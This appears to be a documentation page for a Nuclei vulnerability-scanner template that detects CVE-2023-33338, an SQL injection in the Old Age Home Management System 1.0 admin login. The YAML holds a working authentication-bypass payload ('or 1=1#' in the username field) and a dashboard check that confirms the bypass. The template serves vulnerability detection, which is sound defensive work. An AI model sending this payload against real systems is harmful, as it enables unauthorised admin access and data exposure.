Skip to content
Nuclei Templates

Old Age Home Management System v1.0 - SQL Injection

ID: CVE-2023-33338

Severity: critical

Author: Harsh

Tags: cve2023,cve,oahms,sqli,auth-bypass,phpgurukul

Description

Section titled “Description”

Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2023-33338


info:
  name: Old Age Home Management System v1.0 - SQL Injection
  author: Harsh
  severity: critical
  description: |
    Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Old Age Home Management System v1.0.
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33338
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-33338
    cwe-id: CWE-89
    epss-score: 0.01754
    epss-percentile: 0.87944
    cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpgurukul
    product: old_age_home_management_system
  tags: cve2023,cve,oahms,sqli,auth-bypass,phpgurukul


http:
  - raw:
      - |
        POST /admin/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        username=vaday%27+or+1%3D1%23&password=password&submit=
      - |
        GET /admin/dashboard.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "Change Password")'
          - 'contains(body_2, "Old Age Home Management System|| Dashboard")'
        condition: and
# digest: 4a0a00473045022100ec6c712ab58cdda568fcabb9c02d96d8af6e69a708133c75a40b1333a74f57cc02201902e278626ad458acc6266ee40d28b504429ad99c48e31cfbe3cf6801797a28:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-33338.yaml"

View on Github